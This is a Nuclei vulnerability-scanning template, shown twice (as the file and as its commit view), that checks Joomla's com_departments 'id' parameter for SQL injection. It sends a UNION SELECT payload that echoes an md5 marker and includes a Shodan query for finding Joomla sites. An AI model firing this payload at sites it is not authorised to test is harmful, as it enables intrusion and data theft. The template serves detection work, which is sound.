nuclei-templates/http/vulnerabilities/joomla/joomla-department-sqli.yaml

id: joomla-department-sqli

info:
  name: Joomla `departments` - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    Joomla! `com_departments` parameter contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/opensec-cn/kunpeng/blob/master/plugin/json/joomla_departments_sqli.json
  metadata:
    max-request: 1
    shodan-query: http.component:"Joomla"
  tags: joomla,sqli

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--"

    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
Create joomla-department-sqli.yaml 2023-08-07 18:02:13 +00:00			`id: joomla-department-sqli`

			`info:`
			name: Joomla `departments` - SQL Injection
			`author: ritikchaddha`
			`severity: high`
			`description: \|`
			Joomla! `com_departments` parameter contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
			`reference:`
			`- https://github.com/opensec-cn/kunpeng/blob/master/plugin/json/joomla_departments_sqli.json`
			`metadata:`
			`max-request: 1`
			`shodan-query: http.component:"Joomla"`
			`tags: joomla,sqli`

			`variables:`
			`num: "999999999"`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--"`

			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '{{md5(num)}}'`